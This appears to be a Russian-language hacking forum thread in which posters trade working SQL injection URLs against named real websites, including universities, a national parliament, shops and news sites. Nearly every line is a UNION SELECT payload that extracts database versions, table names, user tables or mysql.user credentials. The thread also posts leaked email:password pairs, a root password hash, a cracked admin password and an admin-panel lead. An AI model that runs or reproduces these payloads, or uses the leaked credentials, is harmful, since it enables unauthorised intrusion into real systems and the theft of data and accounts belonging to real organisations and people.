Code: http://www.chayka.org/article.php?id=4630%20union%20select%201,table_name,3,4,5,6,7,8,9,0,1%20from+INFORMATION_SCHEMA.TABLES limit+0,1/* Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, Articles, ArticlesAuthors, Authors, Issues, Old_Articles, Old_ArticlesAuthors, Old_Issues, ibf_admin_logs, ibf_admin_sessions, ibf_attachments, ibf_badwords, ibf_calendar_events, ibf_categories
вот некоторые аккаунты: формат: email: password [email protected]:chancesr [email protected]:51673 [email protected]:lisa [email protected]:lalleman [email protected]:willb и т.д. просто надоело...
curious.astro.cornell.edu Code: http://curious.astro.cornell.edu/question.php?number=-1+union+select+concat(user,char(58),password),2,concat(version(),0x3a,user()%20,0x3a,database()),4,5,6+from+mysql.user/*
www.legionhardware.com pass 1243 login Steve Code: http://www.legionhardware.com/document.php?id=4630%20union%20select%201,2,3,4,5,6,7,8,email,10,11,password,13,14,15,16,17,18,19,20,21,name,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77%20from%20users/*
http://www.consodurable.org Code: http://www.consodurable.org/dossiers_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Code: http://www.ethology.ru/news/?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8/*
Code: http://bip.kielce.rio.gov.pl/index.php?go=22&id_k=-93+union+select+1,2,3,concat(version(),char(58),user(),char(58),database())/* Кому несложно соберите все проделанные иньекции с 214 страницы по эту. Спасибо
... Code: http://rus.militaryantiqueshop.com/view.php?id=-548+union+select+version(),2,3,user(),5,6,7,8,9/ * http://teplo.lakkk.com/shop.view.php?product_id=-975+union+select+1,2,version(),user(),5,6,7,8,9 ,10,11,12,13,14,15,16/*
... Code: http://www.articolo21.info/news.php?id=-20116+union+select+1,2,3,4,5/* http://www.suederelbe.info/content.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
journalism.berkeley.edu Code: http://journalism.berkeley.edu/events/details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,database(),26,user(),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
Code: http://www.a1tv.ru/AOpenBands.php?Band=-57+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5/*
подбираем имена таблиц, осуществляем последовательный вывод записей и преодолеваем экранирование кавычек в ORACLE: Code: http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=-1+union+select+1,null,null,null,table_name||chr(58)||column_name||chr(58)||data_type+from+(select+a.*,rownum+rnum+from+(select+*+from+user_tab_columns+where+table_name=chr(76)||chr(79)||chr(71)||chr(73)||chr(78)||chr(83)+order+by+column_name)+a+where+rownum+%3C=+1)+where+rnum+%3E=+1--
наши маленькие друзья Парламент Грузии Code: http://www.parliament.ge/index.php?lang_id=ENG&sec_id=36&info_id=-16000+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x71),0x71),6,7,8,9,10,11,12,13+from+mysql.user/* root:6b8c7ae75e3ec972 мускул 4 ветки
вот и от меня, только не могу подобрать колонку с паролем Code: http://www.hakiminternational.com/cpCommerce/category.php?id_category=-1+union+select+1,email,3,4+from+cpAccounts+where+level=3/* зы подобрал колонка pass хэш - 5e8e3302732abbc67998f8ccd0362dad ззы пароль- hakim1 email - [email protected]
Для начала Code: http://psyplanet.ru/profil.php?id=-6+UNION+SELECT+1,2,3,name,5,6,7+from+profile+where+id=31/* Дальше перебор по id Есть еще таблица user.
psyplanet.ru ничего, что не в личку? есть таблица user (user_name,user_pass) с админскими записями, админка тут:
http:// db.peacelink.org/campagne/info.php?id=-1+union+select+1,2,3,4,5,6/* index.php?id=67 +union+select+1,concat(user(),char(58),version()),3,4,5,6,7/* http://www .htmlbook.ru/content/?id=97+union +select+1,2,concat(user (),char(58),version())/* http://www.pcbsd.org/index.php?id=67+u nion+select+1,concat(user(),char(58),version()),3,4,5,6,7/* http://www.i d.isu.ru/news/index.php?id=4 1+union+select+1,2,3,4,5,column_ name+from+information_schema.columns+where+table_name='phpbb_users'/* http://www.ad ilsoz.kz/site.php?lan=russian&id=539&pub=-1+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13 /*
http://www.cleanedge.com/views.php?id=428900000+union+select+1,2,3,4,5,6,concat(USER(),char(59),DATABASE(),char(59),VERSION()),8,9,10,11,12/* http://www.moresca.com/views.php?id=222222222+union+select+1,2,3,4,5,6,7,8,concat(USER(),char(59),DATABASE(),char(59),VERSION()),10,concat(username,char(59),password),12,13,14,15,16,17+from+users/* http://dinchen.jtagice.com/views.php?id=0000000065777+union+select+1,2,3,4,concat(user,char(59),password),6,7,8,9,10,11,concat(USER(),char(59),VERSION(),char(59),DATABASE()),13+from+mysql.user/* http://www.procasapanama.com/views.php?id=31111111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* http://crca.ucsd.edu/views.php?id=222222+union+select+1,2,concat(user,char(58),password)+from+mysql.user/*
